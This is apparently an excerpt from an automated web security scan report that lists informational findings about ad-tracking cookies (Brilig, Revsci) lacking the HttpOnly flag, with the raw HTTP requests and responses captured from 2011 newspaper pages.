GET /contact/bct?pid=21008FFD-5920-49E9-AC20-F85A35BDDE15&_ct=pixel&puid=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&REDIR=http://tag.admeld.com/pixel?admeld_dataprovider_id=27&external_user_id=1&_m=1&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_dataprovider_id=27&admeld_callback=http://tag.admeld.com/pixel HTTP/1.1
Host: p.brilig.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbid=AF3T0ZuAGOk4NdOmwmcHrt8jZvpqOmyTfBnhe9lXkrHzvb6m4hSMri5FOCMElW8Qz5pV2zxkbOa8; BriligContact=85cb651d-def1-4cfa-a1e1-8e977f5422e6

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/plain
Date: Mon, 09 May 2011 13:59:26 GMT
Location: http://tag.admeld.com/pixel?admeld_dataprovider_id=27&external_user_id=1&_m=1&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_dataprovider_id=27&admeld_callback=http://tag.admeld.com/pixel
P3P: CP="NOI DSP COR CURo DEVo TAIo PSAo PSDo OUR BUS UNI COM"
Server: Apache/2.2.16 (Ubuntu)
Set-Cookie: BriligContact=85cb651d-def1-4cfa-a1e1-8e977f5422e6; Domain=.brilig.com; Expires=Wed, 01-May-2041 13:59:26 GMT
X-Brilig-D: D=9657
Content-Length: 0
Connection: keep-alive

10.92. http://pix04.revsci.net/B08725/b3/0/3/1008211/17329585.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /B08725/b3/0/3/1008211/17329585.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /B08725/b3/0/3/1008211/17329585.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.orlandosentinel.com%252Fbusiness%252Fos-cfb-cover-casey-tv-20110509%252C0%252C6839926.story%253FSite%253Dorlandosentinel.com%2526channel%253DOrlando%252520Sentinel%25253Abusiness%2526keyword%253D%2526_rsiL%253D0%26DM_CAT%3DOrlando%2520Sentinel%253Abusiness%26DM_EOM%3D1&C=B08725 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rtc_t9sN=MLvntzUpZghnJ5G+i+4DV0q7j9FMVCqRtwDvSy+4/qSYgqJKSe72X4w1OsoqG1L6pBK4c+pnxqlazyrETdH5Ss7ZqlAdp3dLz6RiXrd8bWUl0XLFTZoGRlkMvbxWlLJYvRKeW3BPG7e9ZE9B61Tr0Xu8xr7ySWl2ozQ4/U5ZrZxIJ7kQJbMCJWim30MttesFLXZH5EHs6+uRDgRTkZlnHHCB77Ar7hGyOMIesNI9o8/9RNCHjTBvKoYXcOvvnUc3gREPcmtRhgTUBzhJDfhW9iRzZqad1BMkEEMigM51rz87fTY2vzp0koSexDIeushDPwx5lSSemwqHa5nCxRqJDEJhHQKSLfJHzzuMS4QVFpr7//ar/gYMlqPHm+a7O2rKfqFedotktJgoyGoTtvvVeB1WgObPStSqC654B4pjqVzgkVcIp5vS64Z3X4Vwz7RGYuKOb0DaoyX1X76ErVivTuwcME8UIBHjBcbckhVImU4XnKI4J4bfm8SzPc7fEarHQ8eNRbt+NBqpHVfT8CA7WCswlaUKX5R2m/uP1k7D7OapV5fM7s4PFkZLVBzums11/pRTr+vH3zlZ2D1U6oJOxBq6h1nGt8lsO3aycDlfPhTnFCbJtqhd+R8M00mgvtcV2kPHAZhTBULpYa3VoOxt75s7s+OXEMD8kJDhqhAW0xOaaqojt1m2kfCd2fjCHuHb0cRul18AwkGu6zC9b5gjvQWYaAWvEuTjULQnF3/WBu3xoBmBW78cFOqZVsnCJpwlzNwpDnZ/nr094/gLpsTcBz9U0VyWch6xgNeriVs3uCZ+hcbdM5qZSIVPm40FjrdWmJOt2Ypv3a/kl5qli5IOjokQLYqfkHaXdYfke+D9DK5fPp0x3F/DMW5VklD0s2klQ6FvQ8nGV4uNs6prIO+bLFyIVZRDiExpXuh+i+Aq1YmAP/ufHvFjsYKn3OEk5XDAygQ1YpMtM5Sk37DHiy1Oc7bt3PwrwRKxpdfhkxPbOgtaPJkKIgXA1UHBSrD2OZEGtvDFWcANJwDR0VNWid5NgBAB0rwWy6Z9LlselJpaiIgXIaF5h7wv7cU7Y0uZfy2iNM4rSYzqVMnAijA51U4o2W5ntA6EoeSq35Bx9QMDeHIURaKeaZsajRx5lGVOxUpye6PvZN0uuGaga4RrhslZMB2Y9+AWtEFXlROcqQmBVEWszH66koC2U73qDz/yRQrV2HzX7gNGvoPo58JQSjatu9X7ji5cy1E8461WWwOgVp2IkrMWGs11l2+HIs523HQXWBw52AChb40Qk34XWJQuyHfZL9BKo9bD6pY3NmKKLrvbGYtN9z9spKNvqELg64UUhZHAp4leheD4a45ZJaEWok/2mPfmsjSGHyI+cNW11/VKbLveqgLdpHuwgIOrGn+E8XL1rY/dmTnJljXVje3GS73qe0gFIUORmV3zEUoMu8lptwsGFRNaLlIlfH4o/sxxcLaUBc19572hk00yHldk+1d96w8WPNpYQKcbuFCWBQC1EktKTN64aS3+Ym84VuWwrnmLsUd+YZBuBFuReQ3pxDY7f9Wawu8mnlboSNWsLrjMJt5gOyEZGvTAlzDiB1dDEroCTz/E9E4GpyJPKfuKLsHuCzLY21x7DZuu5S8mZ7fh28cQxt+2YLsEHn6UBTWD6KoqxACfoIaPep7kzEs=; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decdd4f&0&&4dc619e1&271d956a153787d6fee9112e9c6a9326; rsiPus_oJ6I="MLsXrqEO5ihr4JB0esFCP3iTwKJkgx2gQRTIgLpbO5bzUKo5agSRamM8BUBiXf5iQVJE/qvOLDxrtPlWva+WFfRLnrsgVEgRJznRYvE/JCbIJlFRZ0v8lk2FMP7VgY0aDJ1uvr3sxbowAuFyRMBuLfYcr6fFEv89nuq04UGKmDchPxvf1VTgDWJTEx5Kkr8jzQunm+6oPneCoGtSQhyGHZzxdfyY9pzlPM/onuX9X2JdmNFRliGjpOxxE+0pD+DBZZWgpAquHQkJ1YB5V5px1bD3K+pKttxiYRyYsLRuin4AdpE+D57tHyWhDKXYnaxmhDlbT40RVZTlQWa5SHr/yRW15cgoL2BTNz4ZHIOIbZ3w+GOVtetiHdAwjqA5Ui4WrA6bK25LLI4Ir9sIh2o24VUvkbMIaqCDNsF2jNanIWOT86v7ILEO8GTv7ysgdBPV7GNAhaATIC6+9HWKklodYgNie3KEsyxp4Ip53yIQktBt7x0rOG5/65JnmRP6pZbn0beJZ9e2WzN097dXeixXnHdq6JFVAyAbmpVkkwNOY+wWd6dg4Jf/QXM8CJVkFVKLOlMwzlBml/4yW2mwTMAgsUWTbJEe3D5h5Qu+avLmgFYgCdm3afOE65XEGgbY6gQI2QyUKfE89OzxvQEeuV8Z29PLI2LFlmgFNy3CKVxZ5PwiIOfTemnz/u34vuwdvk5OwPoIKx6wc64f4XUyQCxKRAMtrDlD3lqOkddwPiQPQWSdxvqE7+8qAf4lJEA0RdLVS+EOIKQcs4IiqbmLClAFvanxVnt8+DAJ/at8TweJdiurVsUJ39ifvys0hlSV/6J8xDBFRvnTXW7RHu077j5I8EhkX0VLoUvlsoHLXJRFSkMMdD1Rjk6kj6u7MTXab7InNjSHU6mj9FV6J71+hVaENmvO6xRYxe8DwuUoxcZGfl++Mz5gpSVkriCBhEEVGAa0whhl40WBypkKGx6ytK8eGBxCHtMy7YXpAt8GVfXO2nHdDF5NRbljpX5a2idAiaY9hZRKaSwdCl0zO8qy8rZheiOX4dGOkvvILbHnPIk="; rsi_us_1000000="pUM1Iz9HMAYU1O2WQ6agQvHtomeqiTx+scbgotrS/irrnp9hR1uXbUVk0H3WxoeLl/xLNe9VpQo58/SfnwRIVPklZlA8PnoYUYWIbDUqYS9zQYnZsUoP3QRkponkl0tHHb8kkKwgkXBko7XOn1jpgcgJQ3/+sBnkvl0R76S9Yt1TpYoxEcshze8XSI9IYwGJZAQM8acKU6QFRiQuOSfWyKPrE4VIXPPwX8RUWiY/UssOCRqN2G4sqarRk4NsaJRnlj2K1Y5HUKhRsrHbW1pTdRNtT9ZKulZhziyboYdrEO2sarAl/MFVZsjwi/Wv3qLm1Fs/xHiIfiPD8ptaFv53hhEy0x9Nzgra6z5i1sNDBdwC2AMM5jmRxk1HiSJ7rc7geNXoMpcoW5lazev62kFjic7GRlCPMyreliDoEbRStv8bUX0hzqBtlrJJ71XkLAtbR3bp3YXVlT/i03+GD+X4pnqR31ooqOicd/3sY/HfyHpsfYFpK+9cKfsOK0TMqmEZgg6TVATszTa6DVBy+9HIW60cgGORBfFeA3V7ZWrc7A/f4TCz6oav7WuUpl/8FU3EZiYlcqNpGIiqu0EDyUFyBc0Mm83cLtn7n1YkzNAWKjM3BMlNOvL7luAFxGav7veb18OL8FnDLIcc98IdSjePgO4x+TnvWMc1o3LMnx7KFnEVNL/zr/l7lPtA+JVzT7cnj2wyE4QaQHKh6Ok04D+HbZpnYVGPcUhH7ir4iXn1X1fRi2WC4X27+2MYNn6XJpgOOB6hxeYRKJezFPVyYHA0E8k8Y6vPmqAzcUQ1GgmrtVMO5TynL7MxkjlDhd/qkAAADTkEWFYjM+71vkik63NbiYJzNhUruoYNDY4+Cdad8nntQwYFdaZi2z0oTqrM2W9VLHxiO/W3OZ/DoHhIVOR05q3qEJsSQqz4HlTPFqdP6tMOPEdT2mlN6I+snoH5H1+95/20PTZV63bqPslFDdpjQUzOUzlGEQz5vlwfpcobNG6ZffmcfXkVRA90ZS5vDX6RoLFO4jXs4PfHmOaxRujzc+ZZx71yBGG4cW6a3AIc/QKBNjPUub61ya2Yeam0YNeI4XUBKw1I8arhmHwBw24bTrJB78myPAavjRhXseaoyMiRz2SpgrQict90ITDGOCmvQzQHHUwrMEuS4OMOI9nlvFiigkXOsxfJqbwLbPJxK7vepa4gP5k5reKfLJLOzB1tAhyu+0M+ogOQqwjKAaQSNYVRfyphA/AzKCF02DWfoPvuUecdYTEKFjQ1VG+g3YxKNYroKXLd8VGMnDiPqMcBJGPJAP5XjR0FOhbahAhbE9hcU3YzJtc0N15WcuBwumA6aiTCtPbC5GocnaApsWij2wpzPNdaYaar/KwBLK+unvGZw9So2/L8umdKyijf1qIYR3BsN1iRRVSFtpq1rjLe/12ruK+l5hbTSkGCxSxVj27tdXKbj+wNhb0Grx0f0RVz96JdXLab+X7gER0OWV6Ub93Iau3V3nA8U2eR3eW8WCzYma60upmY8LQB1Wa9Fjetzfo="; rsi_segs_1000000=pUP15EOheQIMp6aIYFMFwqgWKICRGi4LkSGHuoVo77dVqa7OUgcXqUqruxUK6pw26DoqAlJFLZfT4Ux5SbqTCquHuUc/XRFeRyFWPT6EN6ib9rOgornIgakmFz75BmUiSaHo+JZst/oPR9Zq4Tt2uVGJOix55hSkJ3LJKPQI1gnqJcPO+B0wk0qpMSQXyFuCqQpK8r5tYBj/bmtqBKECRDiwMULcazzRzzBdevJ3YZlw1fzc91DujPMvIrU3lBGHD+Oj3GY34vTCgAsALTSPABX9K+qdf26V67jxb2rFhuao8e8wHgc9RUGL1UarXrcKQoVg0O/dT54uSAyDaigAqzmSFzhzgmZT9BJMxPzc4NCP+DgolO7MVTtmzKnuBLvpPBvKHLv25Ok9kGqHBB+5DATvbNCMmEyH/IFwSZOzLes1MyDqRGKgNkRhQbjaoTJLPdtrCZICmiIGgDOjcsfvI7HUAbHc5uDjeMPwiZi1ff82KhtEfczsj5sp6lx5+8qHgTs7PhiC628AdVlOSeURpAhS+ptW; udm_0=MLv39SEJaSpn5l5JaNmEkuE3HUfpKukmYdMDpWl91ayhwRubWQXgIvDjbAfrg/29bOn80aspEjLkY0Vm5jykc8vlM+asjYXwUNBm8PAnICnqZmXPA2Xh4iXCZfVd0OlQYBkbXZ+fE6xbkp+73m7fIwK03br0hwtLMAEvv2rlPgGe89DL7XhfdVWhqZR9IJtOV/i1jO1ZeDNk5nGvWDb2PMoNNxQmAZ6zNXTvxPWzGQru57aNGbSPs5YITJ6dgGM+1EFQ7rwvQU/3y0FVcW/RyM2R9eN2xwK8bnOaT8VmyGaiJAmHHT8pBOIjlNDpzV6u3eTl4sJnmU/0g35ohvpAU8GROqgIjhxL+GgGWQd3fiucGGEQMG7fmNa3OPv4XHHRchnyjVtpb57h14/z5K85rTQ/KQRAVRDGCL+XD5TdnTh56FjyfTXn7JG824dYd5/r58WV/RlBw2/F8diIsfV//85J+E0pKIuSfQ+SwE6r0YYXff3vWeDASYs3zZpgv4oa69Fd5eAZ1Uv7/AHMTcD2hn04fTEwuRm02I/GkdiGiO/Oep/wYDuImtgU81hj8iDIv6L3GG8EGebm40kirwWY1y7cbY88ACfYnLhzClZQGGL8rkkwzr15uWlyzk3u6tiKLhMW/7hI0+en5ypPmrofnMOnqu7LSdBFwJUWwRWx/BdDZfZrSBLyd5FmjsyX8GtLepyF22ceWta1F40Fb6h1cnVajJZnBxwFGO4Zzc2jJx2RU8FnBu0kK+uWrNR9vrUYheYcw+lfxZWr8PUmbnVUirgeHvGExE4egj3Cmp3LNIEqIlUf0bA9h+7zUyYz4GsX4HrwVpb0+VSxxpbK6xrU4SoHOM3BkRCnuWgzboQ3SbPX1Nk3QZ5DzupOAyEap4dsztSqS78uAWyMcF4bxwbk+oyCbTDIeaKdmRwU4bXSHO+yQQb1hHHArA+1gn4reGVtXP++OVhSsGk9sy7OypPKnV6nIoneqia4DeQzD3Ayuxicz1pZ8HuWb1lz57GZY7s3AFPYaE+PKJaOZtO75ZQjhh61XrGDsiFWC1SrFQhJe3rOJ72O2/aPpYGLkNH+q0lALd+hspZ0xjUvUIH7YMLWdJfjOwcJdpeeojZ1zsAWiVEGHp9FYi1g5c1CP4qfluz8TpyDo/uEA6HTc7FOw+NdZRDrF0NHmENciJm6LX1drY/i89D5B/dqyRL0sAv+C/LiRm/IHGDoImZmxGi7o3CwQS42n0eLP9W9jCO0gTjQM8BFvoXdV0G2yONS0bGBprUcVrzLpG2UbPzBLFdo9j6kKHuOLQO8QVU=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_t9sN=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhMHIMN6L9XiOlhjCqMTK6h6pMhgM0dgR2ZLwQuK591A7FUMhc07fslEjp0ID+u123pQJ2WOOcFehcGwRO3+GBodUoFsbRk/QoWYk4c6JHEfwMOMG014RVW/ae4EVImiihCtAOR7o00v1Av4W+67mjSX931yJFNEGnkXHKKGemM6oakhZYuNn++XSAaSD/KFcyeItwGqWmS5L1fWz3jOS657huku/N0SVSl2cJ3lUp4mzf/15P/SpH3uMjdcidqoplEHbuchfD9ywF3P66kGsfxYo1mxoy+orHpQk6PK6+svaFag8xPIug3kXteXuVX2UEJaBODIxOl+Ft328ehTKAqGkfpU+SdWY5lRxpDwKjYa958M7DcCelfS1RBfPRqtbqpB56CpIqfy8vz/43Wm1wI5tPyY6T7TDGk8a5yJjVF7BgBg2gp94t77lvFYAp63GPCqzUCUz4o8F2YAwwDQna6pVUUkDxayBLH6sVK6odcuFf/h6IqI+T1O4+4CkO2a0mUowSwIf12wRxvpzxTQhOmTfqLI4XiOI0TpY=; Domain=.revsci.net; Expires=Tue, 08-May-2012 13:59:49 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4decdd55&1&10011&4dc75936&271d956a153787d6fee9112e9c6a9326; Domain=.revsci.net; Expires=Mon, 06-Jun-2011 13:59:49 GMT; Path=/
Set-Cookie: udm_0=MLv39SEpbjpv597JcdnUBqRXwE9C6/Cqf7FfeAwqkwUJYsjV1VT8Vwp9cVb9CgNYjp8en758sA0XKo3DVxS11pqXgVYJjIVBn6R522ynJl2ax8Qx/jpyP9nI5ve44EGi/bzdEoOJlM3XmoyD7igaU3tTFNgDCDCDUIu11dgC3DX1bT0q7kGCESAJ/Cv0EEqKp9GTH5HWhuYAdRKptwX4H8eQr7jJH0NNjc4WK/BQeyHLwV2o8cicUpdbjoeqF+cev+WKcahsupxIlPf0Hsa0+5IuLGQ/yjtOanPI2a5vgGwyXsCxH5I4Sw1RAJCmTI6so2Vx9lmyE3fLbl2ALlBW8LSiUVCJw8lTBn5whfY4Ll3AHOGg6BCa2fIHi7Ms7OHm/NTSgsiiWIDtT9stG8zt4df+tTP3Vv43ld6GTzrd1879JV7Hb6X0z0XPVlId/zXOw9aaQEeqgMKvOKO/hLHpLL4r0ht87tG9lRvvhCQx73uGgiJbbzIqpi+XxCySNV6PFfTGQPlDZMZdvrsS20nVypdg+3I6J/jerpCvbMmWz5JKypIa7XW+EYTAyScp1GV448RwTO3/o+YmVgmWRXZM8hmutXz2qy0amKv+fdpjQCyl4LHSRxS8q4S9dOkykun2Lsx75efp63cKH3AtBYanHLF6BOnMPRtQ1F6RXEkuC1mnpvuHU0/gnd2zn6PH0JAf42BAa7OU1+7J0uhxL21j42cgJQU42PRR28JdKFksuxuEtiv8eWZhIMpUDRCOm+F6HtKMzBY7QUa3LgMgvGvszHsaS643ktq8SXod+oiVmp+dG+uf9dqtgVZULhl8CkwS45O2RSPtGh0pn7rH2ci5vobjeAUr3OiIIqc1bC9chVBX5dC0gdf1ZNc+4q3ub+yMggdR+qI05aDPLp7yPvzUJhxmf/o8HxKTMy3YiZaFWQq2zvyja+wD978ZmaRKas1ckp1iwAG3cKuUKYU7KK8+yM7TCt9HliKKy8xo5nSSPTStnrR8C4vJDpbmfJV1dCDE0s+U49SGwHlQNapQ/M3eVlg9By4tHJ1FZh8YBx0GOVN9r0OC1O3WSANLVhkYVB0YDSwTSC4msldfh50Zhm2odNhEEKzdCxEoNIZrFBdYEX2NX1+GHcuqrtRLo7/4htbS9j2iHN1YwbInHOeUEj4lE42McjMkWUqocMtbk5zbuh3dEwhW5jdeFiQviIdK5WVVVa4tPFmLDZToCcDw/D3Xz7PVTBwjZ4ZmjIorRxiz3DVNcZA1aGFkc7CQb80Vid32ageq+r6e9QwNxDn9s9yJCTPoOp6O7MPYtm+2ZlJ2T8DsLvYbT9CQyUiB5atNm28mK1JE; Domain=.revsci.net; Expires=Tue, 08-May-2012 13:59:49 GMT; Path=/
Set-Cookie: rtc_bhnH=MLvn9zU1JwprpgZts8KQPOfaDcghJRY/syRG3WmM3le4ahJ60DTLD9+eQw9TOWi3mDGoGjklUGHxoEY411AnlDFR7yxZ8S+5rurGG9f9pKwr4QIY3riFWwRW2/4Pe6fIj9pfpVEFteudvD/rxinl01fHUDRopiXl3GV8QG4osgcIGNdQx253r5pJdcwR9YNyu0DNQTJxMId3nnJVUuDBpShinKA4tGa1cJ5+Hi2h59O3EJ9kKg9GI5OyNT9anWrXE6ywNFSU8AW4cLbauLlR5eS2CLmnPIYYHKESl6oWWm0MTZXo6HvTRjOh3Kxjjr71vvRTm7L5Tz/0AbnlXpfN5o3CS5RjdMCB3pJQ2xQbBI3eRje/yubp9KxdtHOub8fTM28fZtJ4Ff2evOSytK6+rguHT8qBsX3nAF+4suLuuzKXbljxXplpid99mfevz1NlGM1rlme7TFJHFw4T1WuGDkF0/Bw+17f4hzOZ89iGWZOwrinriMKVgfY7jgoThgi2LCqlToo4fv3BlxJBfv516scfvSGQii09J+OKaow2IMFHec2le5u592GGLOoNfhzh0wpAqny0dXMRunGZyuZpmgLUxyUcKEwjHtT4X/AWCCCKORS/JMUrvxw3RAPJ6tF7CPQVmN7vqfcMGol2PIwqma6LxPH616WqLSzSnYgrsHT0TROIWZVFqnuaJM072T0MT5VgEjbfrOrd4LflERbjcTxSI2oeuTXiK4/DDbsMpXxVYN1Y2+usrIA2tC4YKZcBieXRepuUWczdfoZq+FnW2fy54+8Ahj2DVr9lOeaPFz2YdxRA1DSkZ4p5j9nptFqVYRp7FQzd3L/rYbDcNwxsgNzSO1d/3MsEpZ+u6l/tYp6235d2EPF1lJvs+eY9ItWr2vywljErTzIjlFHOn3/vKN1lEO73a0MbZqAdadvoFSbLJ0FvE19rnlZr+jLJUArQXcyjG6qIfxe/x1qg9xSiD31RT940BPPNPFuSB3jU1xCgzxdwZN+cLq4+t59GjXdlNZMYlZEgjb2U0xa8rhgytOKQKj8cmLxuSqaEZ+rWPzIohHg8f7s/uwKkvXH7iStjrfLqN0iCTEktKJXa/EwxS3z/MCvPn1r/idkifyjhHKEVC9C8zVl28Q/obJ7v8A4+p79u6ECvoWawsZnxyX2Sk6D9FNVYNlOJvedTMFsJwjXTr5IfjCyqZk/UBqwFopBNsF8mpjRgy0jItxUL6s4Q7hJdKlt00izGkWFGjIaDJ5kgZqTbls7bo0uCnBhS0EivUGf5It9R036YZRZQhxLAMohm4BfvheaScBd0B6LD+dTsBOvBZt9qi8tKiSbAaWZAZG0kSm+xaQ8kjECVabgciinTfHRfdpcUgspdFtG/gYEj/BGsLUEDEDI7RiOCgIHqoGp9U8cm+NPOB87TWiP0V9cm6dG/MoQEGnmIEcpVMkMbUqQQPupK8MsZQ14dKvTqSRi8zQdNUKGRl/VBOD0x4AipEdvfcRFT77t0mzC0MtmgixiyT97l2MWc7nrXw+dbSqjkDo/V3VevRKGZiARbawBaubiTK1iTZ5X/QPG06n9m/GdUjFWTiJTeUtEsWyR/00AFRQ1ar060riKgW0WNe5vm1v/hmD2/AqXENoELyR0vXiP4im0//qAix0JrmEcuVRVnuzsHTORwkiEWyF8n88lfFjkZL4mXL6Ur0sWd4e2vaJRwp8A=; Domain=.revsci.net; Expires=Tue, 08-May-2012 13:59:49 GMT; Path=/
X-Proc-ms: 37
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 13:59:48 GMT
Content-Length: 849

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['B08725_10011','D08734_70008','D08734_72078','B08725_50060','B08725_50578','B08725_50657'];
var rsiExp=new Date((new Date()).getTime()+2
...[SNIP]...
10.93. http://pix04.revsci.net/D08734/a1/0/0/0.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /D08734/a1/0/0/0.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /D08734/a1/0/0/0.gif?D=DM_LOC%3Dhttp%253A%252F%252Fgoogle.com%252F0.gif%253Fid%253DCAESEIuMZ7FlTxCZ1EPDlWZ8EFI&cver=1 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rtc_dGQ8=MLvntzE1JhpnJ5HLrv64joSEnGpKJDT5hxKcHQSZ6JT8viKgWFC/KkqPtZ8Ankr/EnNoaE3mdCHtdlcixiAHZGc5ezrv5YBAdX/ffqRorXEpNdm/rNPw0/Ru+FNWlqRUvIr8NZmaxT1XfsCBFwC57YYoJ8dUD0ufXIbI1AwqHU25HskJyoFKznw/sQhMPIHBJ73VP+WsQCcosoyebxnNQyk5bw9Bsr4Ajd4MGQyGjCMZs9RGNNK3gZkDTzt4/z2P/Ssv9/K+M83DKiwjAWi8utGtTdqyGb4IzhNu3lsN08QDZagfgB4l585OsT74yWCR/KejYXQTd4DW18xFu0u1sQaoaWTBOY/Jxq6p5u3FJalMuYrYBWmo4ctB0D/HgTzFFyfS+BUCo8wmacnHn4O/MsiR2LqU0m03bN27yxGajd0JW3dCdPkdZinY1oMQBDI5k5dohjorfehJRmVPiseZIe1egdAPJ2sDRkJZHabCSecm5jjK+CYjNinTqMghBbn4sodp/UCGYsEy7xf7J4OYFvLqndKiTaZQoJcUKc5oyzoKOM7++hWWLcTkob9bgmW9ufD3VkBebI8gJJxHhcKHrWm/eJZhnAjZdYP8LmVqJGER/ulNivQAr1Z9gh1pS4MHtL1CBSQLuxshNTfgm9Qnh83PhCXe6Yvk2VmX7Au4CemkqCTRRfHacCGSXK27rvSN58qKJgVMxMrJq29BzeVX0qGqvzZWmcCYGuyXUAPPKpj0eqmYV3+M63GrKuWMAA8+PbgoD5b7UZmM09hAnd1w2MxukZA3cMw0224znNvYvw3C0g+hDTgcn2mNvmM3NKx69VBxkjkOZxx6XZSBxHuDhwFRo0mFMBl0fKMGrF9xGVp42oFAH1EEod/28MSymYNvCbsfK4npaI+P8SK2x4V96vPHuTLDy/Cx6vHAh+vGlGwUBCANBff9nrluERrS+3Fyfx+Ui+p8hfo8cX2P+ETONPEfu+uP1+RCcG/400DyLJkt2SPTwT9pApTDqP6SZyya0LZzhosQBzN0pTIbzDXEeGOqYZP9VfGtLlYN69+lf/n0KwunQtrPfAR1dQ8puRIko3TButILht14pfWmofo5W0T3geacseWomg